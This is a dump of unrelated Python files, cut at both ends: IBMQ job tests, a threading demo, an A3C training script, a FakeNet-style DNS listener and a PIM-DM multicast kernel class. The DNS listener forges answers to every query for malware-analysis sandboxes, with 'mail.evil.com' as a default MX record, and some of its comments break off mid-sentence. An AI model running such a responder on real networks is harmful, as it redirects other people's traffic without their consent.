self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Used for `db_filter`, should not override `start_datetime` and `end_datetime` arguments.
past_ten_days = date_today - timedelta(10)
db_filters = [None, {'creationDate': {'gt': past_ten_days}}]
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
for db_filter in db_filters:
with self.subTest(db_filter=db_filter):
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month, db_filter=db_filter)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_db_filter(self):
"""Test retrieving jobs using db_filter."""
# Submit jobs with desired attributes.
qc = QuantumCircuit(3, 3)
qc.h(0)
qc.measure([0, 1, 2], [0, 1, 2])
job = self.sim_backend.run(transpile(qc, backend=self.sim_backend))
job.wait_for_final_state()
my_filter = {'backend.name': self.sim_backend.name(),
'summaryData.summary.qobj_config.n_qubits': 3,
'status': 'COMPLETED'}
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, skip=0, db_filter=my_filter,
start_datetime=self.last_month)
self.assertTrue(job_list)
for job in job_list:
job.refresh()
self.assertEqual(
job.summary_data_['summary']['qobj_config']['n_qubits'], 3,
"Job {} does not have correct data.".format(job.job_id())
)
def test_pagination_filter(self):
"""Test db_filter that could conflict with pagination."""
jobs = self.sim_backend.jobs(limit=25, start_datetime=self.last_month)
job = jobs[3]
job_utc = local_to_utc(job.creation_date()).isoformat()
db_filters = [
{'id': {'neq': job.job_id()}},
{'and': [{'id': {'neq': job.job_id()}}]},
{'creationDate': {'neq': job_utc}},
{'and': [{'creationDate': {'gt': job_utc}}]}
]
for db_filter in db_filters:
with self.subTest(filter=db_filter):
job_list = self.sim_backend.jobs(limit=25, db_filter=db_filter)
self.assertTrue(job_list)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in job_list],
"Job {} with creation date {} should not be returned".format(
job.job_id(), job_utc))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
@skip("Skip until aer issue 1214 is fixed")
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
new_job2 = self.provider.backend.jobs(
db_filter={'id': self.sim_job.job_id()}, start_datetime=self.last_month)[0]
self.assertTrue(isinstance(new_job2.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job2.backend().name(), 'unknown')
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
def test_wait_for_final_state(self):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
exit_event.wait(wait)
cancel_job(job_)
wait_args = [2, None]
saved_api = self.sim_backend._api_client
try:
self.sim_backend._api_client = BaseFakeAccountClient(job_class=CancelableFakeJob)
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = self.sim_backend.run(self.bell)
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 7), daemon=True).start()
try:
job.wait_for_final_state(timeout=10, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
finally:
self.sim_backend._api_client = saved_api
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend))
try:
self.assertRaises(IBMQJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMQBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.sim_backend.retrieve_job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
threads.py
|
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from logging import basicConfig, INFO, info
from queue import Queue, Empty
from threading import Lock, Thread, current_thread
from time import sleep
from .jobs import CPUBoundJob
class Service:
""" A service that operates using thread-based concurrency.
"""
def __init__(self):
self.run_lock = Lock()
self.jobs = Queue()
def __str__(self):
return f"Service-{id(self)}"
def add_jobs(self, jobs):
""" Add jobs to the workload queue.
"""
for job in jobs:
self.jobs.put_nowait(job)
def run(self, n_workers, timeout):
""" Run the service with the given number of workers for the
given number of seconds.
"""
workers = []
info(f"Starting {self}")
self.run_lock.acquire()
for _ in range(n_workers):
worker = Thread(target=self.work)
worker.start()
workers.append(worker)
sleep(timeout)
info(f"Stopping {self}")
self.run_lock.release()
for worker in workers:
worker.join()
def work(self):
""" Worker method to continuously process jobs from the
workload until the service stops running.
This method is executed within the Thread context, and will
therefore run multiple times, concurrently.
"""
me = current_thread().name
info(f"{me} is starting work")
while self.run_lock.locked():
try:
job = self.jobs.get(timeout=1.0)
except Empty:
# A queue.Queue will raise a queue.Empty exception if
# the get() call times out.
info(f"{me} has no work to do")
else:
info(f"{me} is processing {job}")
job.process()
info(f"{me} has completed {job}")
info(f"{me} has finished work")
def main():
""" Create and run a demo service to demonstrate concurrency using
threads.
"""
parser = ArgumentParser(description=main.__doc__)
parser.add_argument("--jobs", type=int, default=20, help="number of jobs")
parser.add_argument("--seed", type=int, default=None, help="random seed")
parser.add_argument("--time", type=float, default=10.0, help="time to run (seconds)")
parser.add_argument("--workers", type=int, default=4, help="number of workers")
args = parser.parse_args()
#
service = Service()
service.add_jobs(CPUBoundJob.create_random_list(args.jobs, seed=args.seed))
service.run(n_workers=args.workers, timeout=args.time)
if __name__ == "__main__":
basicConfig(level=INFO)
main()
|
a3c.py
|
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import math
import os
import time
from game_ac_network import GameACFFNetwork, GameACLSTMNetwork
from a3c_training_thread import A3CTrainingThread
from rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import NUM_GPU
from constants import USE_LSTM
def log_uniform(lo, hi, rate):
log_lo = math.log(lo)
log_hi = math.log(hi)
v = log_lo * (1-rate) + log_hi * rate
return math.exp(v)
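# Illustrative check: log_uniform(1e-4, 1e-2, 0.5) returns 1e-3, the geometric
# midpoint of the two bounds, because interpolation happens in log space
# rather than linearly.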
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
global_t = 0
stop_requested = False
global_device = "/gpu:0"
if USE_LSTM:
global_network = GameACLSTMNetwork(ACTION_SIZE, -1, global_device)
else:
global_network = GameACFFNetwork(ACTION_SIZE, -1, global_device)
training_threads = []
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = global_device)
for i in range(PARALLEL_SIZE): # For each training thread,
device = "/gpu:" + str(i % NUM_GPU) # Separate threads for multiple gpus.
training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
learning_rate_input,
grad_applier, MAX_TIME_STEP,
device = device)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# summary for tensorboard
score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", score_input)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)
# init or load checkpoint with saver
saver = tf.train.Saver()
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded:", checkpoint.model_checkpoint_path)
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: ", global_t)
# set wall time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'r') as f:
wall_t = float(f.read())
else:
print("Could not find old checkpoint")
# set wall time
wall_t = 0.0
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
# set start_time
start_time = time.time() - wall_t
training_thread.set_start_time(start_time)
while True:
if stop_requested:
break
if global_t > MAX_TIME_STEP:
break
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op, score_input)
global_t += diff_global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(threading.Thread(target=train_function, args=(i,)))
signal.signal(signal.SIGINT, signal_handler)
# set start time
start_time = time.time() - wall_t
for t in train_threads:
t.start()
print('Press Ctrl+C to stop')
signal.pause()
print('Now saving data. Please wait')
for t in train_threads:
t.join()
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
# write wall time
wall_t = time.time() - start_time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'w') as f:
f.write(str(wall_t))
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
|
DNSListener.py
|
import logging
import threading
import netifaces
import SocketServer
from dnslib import *
import ssl
import socket
from . import *
class DNSListener(object):
def taste(self, data, dport):
confidence = 1 if dport == 53 else 0
try:
d = DNSRecord.parse(data)
except:
return confidence
return confidence + 2
def __init__(
self,
config={},
name='DNSListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'DNS'
self.port = self.config.get('port', 53)
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
# Start UDP listener
if self.config['protocol'].lower() == 'udp':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip, int(self.config.get('port', 53))), self.config, self.logger, UDPHandler)
# Start TCP listener
elif self.config['protocol'].lower() == 'tcp':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config.get('port', 53))), self.config, self.logger, TCPHandler)
self.server.nxdomains = int(self.config.get('nxdomains', 0))
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
# Stop listener
if self.server:
self.server.shutdown()
self.server.server_close()
class DNSHandler():
def parse(self,data):
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception, e:
self.server.logger.error('Error: Invalid DNS Request')
self.server.logger.info('%s', '-'*80)
for line in hexdump_table(data):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80,)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
self.server.logger.info('Received %s request for domain \'%s\'.', qtype, qname)
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
if qtype == 'A':
# Get fake record from the configuration or use the external address
fake_record = self.server.config.get('responsea', None)
# msftncsi does request ipv6 but we only support v4 for now
#TODO integrate into randomized/custom responses. Keep it simple for now.
if 'dns.msftncsi.com' in qname:
fake_record = '131.107.255.225'
# Using socket.gethostbyname(socket.gethostname()) will return
# 127.0.1.1 on Ubuntu systems that automatically add this entry
# to /etc/hosts at install time or at other times. To produce a
# plug-and-play user experience when using FakeNet for Linux,
# we can't ask users to maintain /etc/hosts (which may involve
# resolveconf or other work). Instead, we will give users a
# choice:
#
# * Configure a static IP, e.g. 192.0.2.123
# Returns that IP
#
# * Set the DNS Listener DNSResponse to "GetHostByName"
# Returns socket.gethostbyname(socket.gethostname())
#
# * Set the DNS Listener DNSResponse to "GetFirstNonLoopback"
# Returns the first non-loopback IP in use by the system
#
# If the DNSResponse setting is omitted, the listener will
# default to getting the first non-loopback IPv4 address (for A
# records).
#
# The DNSResponse setting was previously statically set to
# 192.0.2.123, which for local scenarios works fine in Windows
# standalone use cases because all connections to IP addresses
# are redirected by Diverter. Changing the default setting to
#
# IPv6 is not yet implemented, but when it is, it will be
# necessary to consider how to get similar behavior to
if fake_record == 'GetFirstNonLoopback':
for iface in netifaces.interfaces():
for link in netifaces.ifaddresses(iface)[netifaces.AF_INET]:
if 'addr' in link:
addr = link['addr']
if not addr.startswith('127.'):
fake_record = addr
break
elif fake_record == 'GetHostByName' or fake_record is None:
fake_record = socket.gethostbyname(socket.gethostname())
if self.server.nxdomains > 0:
self.server.logger.info('Ignoring query. NXDomains: %d', self.server.nxdomains)
self.server.nxdomains -= 1
else:
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
elif qtype == 'MX':
fake_record = self.server.config.get('responsemx', 'mail.evil.com')
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
elif qtype == 'TXT':
fake_record = self.server.config.get('responsetxt', 'FAKENET')
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
return response
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,sk) = self.request
response = self.parse(data)
if response:
sk.sendto(response, self.client_address)
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
try:
data = self.request.recv(1024)
# Remove the additional "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
except socket.timeout:
self.server.logger.warning('Connection timeout.')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, config, logger, RequestHandlerClass):
self.config = config
self.logger = logger
SocketServer.UDPServer.__init__(self, server_address, RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, config, logger, RequestHandlerClass):
self.config = config
self.logger = logger
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
def hexdump_table(data, length=16):
hexdump_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_line = ' '.join(["%02X" % ord(b) for b in chunk ] )
ascii_line = ''.join([b if ord(b) > 31 and ord(b) < 127 else '.' for b in chunk ] )
hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line ))
return hexdump_lines
###############################################################################
# Testing code
def test(config):
print "\t[DNSListener] Testing 'google.com' A record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'A')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print '-'*80
print "\t[DNSListener] Testing 'google.com' MX record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'MX')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print "\t[DNSListener] Testing 'google.com' TXT record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'TXT')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print '-'*80
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '53', 'protocol': 'UDP', 'responsea': '127.0.0.1', 'responsemx': 'mail.bad.com', 'responsetxt': 'FAKENET', 'nxdomains': 3 }
listener = DNSListener(config, logging_level = logging.DEBUG)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
Kernel.py
|
import os
import socket
import struct
import ipaddress
import traceback
from socket import if_nametoindex
from threading import RLock, Thread
from abc import abstractmethod, ABCMeta
from pimdm import UnicastRouting, Main
from pimdm.rwlock.RWLock import RWLockWrite
from pimdm.tree import pim_globals
from mld.InterfaceMLD import InterfaceMLD
from igmp.InterfaceIGMP import InterfaceIGMP
from pimdm.InterfacePIM import InterfacePim
from pimdm.InterfacePIM6 import InterfacePim6
from pimdm.tree.KernelEntry import KernelEntry
from pimdm.tree.KernelEntryInterface import KernelEntry4Interface, KernelEntry6Interface
class Kernel(metaclass=ABCMeta):
# Max Number of Virtual Interfaces
MAXVIFS = 32
def __init__(self, kernel_socket):
# Kernel is running
self.running = True
# KEY : interface_ip, VALUE : vif_index
self.vif_index_to_name_dic = {} # KEY : vif_index, VALUE : interface_name
self.vif_name_to_index_dic = {} # KEY : interface_name, VALUE : vif_index
# KEY : source_ip, VALUE : {group_ip: KernelEntry}
self.routing = {}
self.socket = kernel_socket
self.rwlock = RWLockWrite()
self.interface_lock = RLock()
# Create register interface
# todo useless in PIM-DM... useful in PIM-SM
#self.create_virtual_interface("0.0.0.0", "pimreg", index=0, flags=Kernel.VIFF_REGISTER)
# interfaces being monitored by this process
self.pim_interface = {} # name: interface_pim
self.membership_interface = {} # name: interface_igmp or interface_mld
# logs
self.interface_logger = Main.logger.getChild('KernelInterface')
self.tree_logger = Main.logger.getChild('KernelTree')
# receive signals from kernel with a background thread
handler_thread = Thread(target=self.handler)
handler_thread.daemon = True
handler_thread.start()
'''
Structure to create/remove virtual interfaces
struct vifctl {
vifi_t vifc_vifi; /* Index of VIF */
unsigned char vifc_flags; /* VIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
union {
struct in_addr vifc_lcl_addr; /* Local interface address */
int vifc_lcl_ifindex; /* Local interface index */
};
struct in_addr vifc_rmt_addr; /* IPIP tunnel addr */
};
'''
@abstractmethod
def create_virtual_interface(self, ip_interface: str or bytes, interface_name: str, index, flags=0x0):
raise NotImplementedError
def create_pim_interface(self, interface_name: str, state_refresh_capable:bool):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
vif_already_exists = pim_interface or membership_interface
if pim_interface:
# already exists
pim_interface.set_state_refresh_capable(state_refresh_capable)
return
elif membership_interface:
index = membership_interface.vif_index
else:
index = list(range(0, self.MAXVIFS) - self.vif_index_to_name_dic.keys())[0]
ip_interface = None
if interface_name not in self.pim_interface:
pim_interface = self._create_pim_interface_object(interface_name, index, state_refresh_capable)
self.pim_interface[interface_name] = pim_interface
ip_interface = pim_interface.ip_interface
if not vif_already_exists:
self.create_virtual_interface(ip_interface=ip_interface, interface_name=interface_name, index=index)
@abstractmethod
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
raise NotImplementedError
def create_membership_interface(self, interface_name: str):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
vif_already_exists = pim_interface or membership_interface
if membership_interface:
# already exists
return
elif pim_interface:
index = pim_interface.vif_index
else:
index = list(range(0, self.MAXVIFS) - self.vif_index_to_name_dic.keys())[0]
if interface_name not in self.membership_interface:
membership_interface = self._create_membership_interface_object(interface_name, index)
self.membership_interface[interface_name] = membership_interface
ip_interface = membership_interface.ip_interface
if not vif_already_exists:
self.create_virtual_interface(ip_interface=ip_interface, interface_name=interface_name, index=index)
membership_interface.enable()
@abstractmethod
def _create_membership_interface_object(self, interface_name, index):
raise NotImplementedError
def remove_interface(self, interface_name, membership: bool = False, pim: bool = False):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
if (membership and not membership_interface) or (pim and not pim_interface) or (not membership and not pim):
return
if pim:
pim_interface = self.pim_interface.pop(interface_name)
pim_interface.remove()
elif membership:
membership_interface = self.membership_interface.pop(interface_name)
membership_interface.remove()
if not self.membership_interface.get(interface_name) and not self.pim_interface.get(interface_name):
self.remove_virtual_interface(interface_name)
@abstractmethod
def remove_virtual_interface(self, interface_name):
raise NotImplementedError
#############################################
# Manipulate multicast routing table
#############################################
@abstractmethod
def set_multicast_route(self, kernel_entry: KernelEntry):
raise NotImplementedError
@abstractmethod
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
raise NotImplementedError
@abstractmethod
def remove_multicast_route(self, kernel_entry: KernelEntry):
raise NotImplementedError
@abstractmethod
def exit(self):
raise NotImplementedError
@abstractmethod
def handler(self):
raise NotImplementedError
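    # Locking note: get_routing_entry() first looks the (S,G) entry up under the shared
    # read lock; only if it is missing does it retake the exclusive write lock and re-check
    # before creating it, so concurrent callers for the same (source, group) pair never
    # build duplicate KernelEntry objects or install the flood route twice.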
def get_routing_entry(self, source_group: tuple, create_if_not_existent=True):
ip_src = source_group[0]
ip_dst = source_group[1]
with self.rwlock.genRlock():
if ip_src in self.routing and ip_dst in self.routing[ip_src]:
return self.routing[ip_src][ip_dst]
with self.rwlock.genWlock():
if ip_src in self.routing and ip_dst in self.routing[ip_src]:
return self.routing[ip_src][ip_dst]
elif create_if_not_existent:
kernel_entry = KernelEntry(ip_src, ip_dst, self._get_kernel_entry_interface())
if ip_src not in self.routing:
self.routing[ip_src] = {}
iif = UnicastRouting.check_rpf(ip_src)
self.set_flood_multicast_route(ip_src, ip_dst, iif)
self.routing[ip_src][ip_dst] = kernel_entry
return kernel_entry
else:
return None
@staticmethod
@abstractmethod
def _get_kernel_entry_interface():
pass
# notify KernelEntries about changes at the unicast routing table
def notify_unicast_changes(self, subnet):
with self.rwlock.genWlock():
for source_ip in list(self.routing.keys()):
source_ip_obj = ipaddress.ip_address(source_ip)
if source_ip_obj not in subnet:
continue
for group_ip in list(self.routing[source_ip].keys()):
self.routing[source_ip][group_ip].network_update()
# notify about changes at the interface (IP)
'''
def notify_interface_change(self, interface_name):
with self.interface_lock:
# check if interface was already added
if interface_name not in self.vif_name_to_index_dic:
return
print("trying to change ip")
pim_interface = self.pim_interface.get(interface_name)
if pim_interface:
old_ip = pim_interface.get_ip()
pim_interface.change_interface()
new_ip = pim_interface.get_ip()
if old_ip != new_ip:
self.vif_dic[new_ip] = self.vif_dic.pop(old_ip)
igmp_interface = self.igmp_interface.get(interface_name)
if igmp_interface:
igmp_interface.change_interface()
'''
# When interface changes number of neighbors verify if olist changes and prune/forward respectively
def interface_change_number_of_neighbors(self):
with self.rwlock.genRlock():
for groups_dict in self.routing.values():
for entry in groups_dict.values():
entry.change_at_number_of_neighbors()
# When new neighbor connects try to resend last state refresh msg (if AssertWinner)
def new_or_reset_neighbor(self, vif_index, neighbor_ip):
with self.rwlock.genRlock():
for groups_dict in self.routing.values():
for entry in groups_dict.values():
entry.new_or_reset_neighbor(vif_index, neighbor_ip)
class Kernel4(Kernel):
# MRT
MRT_BASE = 200
MRT_INIT = (MRT_BASE) # /* Activate the kernel mroute code */
MRT_DONE = (MRT_BASE + 1) # /* Shutdown the kernel mroute */
MRT_ADD_VIF = (MRT_BASE + 2) # /* Add a virtual interface */
MRT_DEL_VIF = (MRT_BASE + 3) # /* Delete a virtual interface */
MRT_ADD_MFC = (MRT_BASE + 4) # /* Add a multicast forwarding entry */
MRT_DEL_MFC = (MRT_BASE + 5) # /* Delete a multicast forwarding entry */
MRT_VERSION = (MRT_BASE + 6) # /* Get the kernel multicast version */
MRT_ASSERT = (MRT_BASE + 7) # /* Activate PIM assert mode */
MRT_PIM = (MRT_BASE + 8) # /* enable PIM code */
MRT_TABLE = (MRT_BASE + 9) # /* Specify mroute table ID */
#MRT_ADD_MFC_PROXY = (MRT_BASE + 10) # /* Add a (*,*|G) mfc entry */
#MRT_DEL_MFC_PROXY = (MRT_BASE + 11) # /* Del a (*,*|G) mfc entry */
#MRT_MAX = (MRT_BASE + 11)
# Max Number of Virtual Interfaces
MAXVIFS = 32
# SIGNAL MSG TYPE
IGMPMSG_NOCACHE = 1
IGMPMSG_WRONGVIF = 2
IGMPMSG_WHOLEPKT = 3 # NOT USED ON PIM-DM
# Interface flags
VIFF_TUNNEL = 0x1 # IPIP tunnel
VIFF_SRCRT = 0x2 # NI
VIFF_REGISTER = 0x4 # register vif
VIFF_USE_IFINDEX = 0x8 # use vifc_lcl_ifindex instead of vifc_lcl_addr to find an interface
def __init__(self):
